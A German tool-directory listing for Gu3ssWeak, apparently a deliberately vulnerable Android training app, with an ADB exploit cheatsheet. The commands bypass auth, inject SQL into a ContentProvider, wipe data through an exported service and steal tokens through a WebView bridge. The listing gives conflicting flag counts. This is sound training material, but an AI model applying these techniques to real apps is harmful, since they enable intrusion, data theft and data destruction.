Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Gu3ssWeak — Absichtlich verwundbare Android-App für Mobile-Security-Forschung und Bug-Bounty-Praxis - OWASP Mobile Top 10 | Kitploit
Tools/GitHubGitHub/b4sith-sec/gu3ssweak
Android-SicherheitSchwachstellenanalyseMobile App-PenetrationstestsWebanwendungs-ExploitationCTFPenetrationstestsMobile SicherheitLernen & BildungLernpfade & KurseLabs & Praxis
GitHub
8216vor 9 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
b4sith-sec/gu3ssweak

Gu3ssWeak

Absichtlich verwundbare Android-App für Mobile-Security-Forschung und Bug-Bounty-Praxis - OWASP Mobile Top 10

Repository anzeigen

Gu3ssWeak

Eine bewusst verwundbare Android-Anwendung für Mobile-Security-Forschung, Bug-Bounty-Praxis und CTF-orientiertes Lernen. Enthält 21 dokumentierte Schwachstellen, zugeordnet zu den OWASP Mobile Top 10.


Schnellstart

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

Starte die App, arbeite jedes Lab durch, sammle Flags und reiche sie im In-App-CTF-Scoreboard ein.


Lab-Kategorien

KategorieSchwachstellenFlags
WebViewWV-01 bis WV-055
DeeplinkDL-01 bis DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 bis AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 bis BR-032
ServiceSV-01, SV-02a, SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01, XSS-022

Insgesamt 20 Flags, plus eine Master-Flag, die für das Erfassen aller Flags vergeben wird.


Screenshots

Lab-ListeCTF-Scoreboard
lab

CTF-Ablauf

  1. Öffne die App – sie landet direkt auf der Lab-Liste.
  2. Wähle ein Lab aus und nutze die Schwachstelle aus (über die UI, ADB oder beides).
  3. Jeder erfolgreiche Exploit erfasst automatisch seine Flag.
  4. Tippe auf „Submit Flag“, um zu bestätigen, oder prüfe den Fortschritt im „CTF Scoreboard“.
  5. Erfasse alle 18 Flags, um die Master-Flag freizuschalten.

Dokumentation

  • ARCHITECTURE.md – Wie jede verwundbare Komponente intern funktioniert
  • MITIGATIONS.md – Anleitung zur Behebung und Remediation für jede Schwachstelle, einschließlich Konzepten zur LFI-zu-RCE-Eskalation
  • SECURITY.md – Sicherheitsrichtlinie und verantwortungsvolle Offenlegung
  • CHECKSUMS.txt – SHA256-Prüfsummen für erstellte APKs

ADB-Exploit-Cheatsheet

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken. Alle Schwachstellen sind beabsichtigt und dokumentiert. Die hier gezeigten Techniken lassen sich auf echte Apps anwenden, aber teste nur Systeme, die dir gehören oder für die du eine Testautorisierung hast. Siehe SECURITY.md für den vollständigen Haftungsausschluss und Hinweise zur verantwortungsvollen Offenlegung.

Lizenz

MIT – siehe LICENSE.

Tool herunterladen